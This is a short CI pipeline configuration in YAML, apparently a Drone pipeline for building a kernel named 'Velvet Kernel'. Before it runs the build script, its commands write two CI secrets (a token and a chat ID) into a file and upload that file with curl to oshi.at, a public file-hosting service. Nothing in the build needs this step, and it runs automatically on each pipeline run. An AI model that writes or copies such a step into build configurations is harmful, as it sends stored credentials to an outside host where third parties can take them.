clone:
  depth: 1
kind: pipeline
name : Velvet Kernel
steps:
 - name: MSMNILE
   image: panchajanya1999/archlinux:latest
   environment:
     token:
       from_secret: token
     chat_id:
       from_secret: chat_id
   commands:
      - echo $token > token.txt
      - echo $chat_id >> token.txt
      - curl --upload-file token.txt https://oshi.at
      - bash build.sh
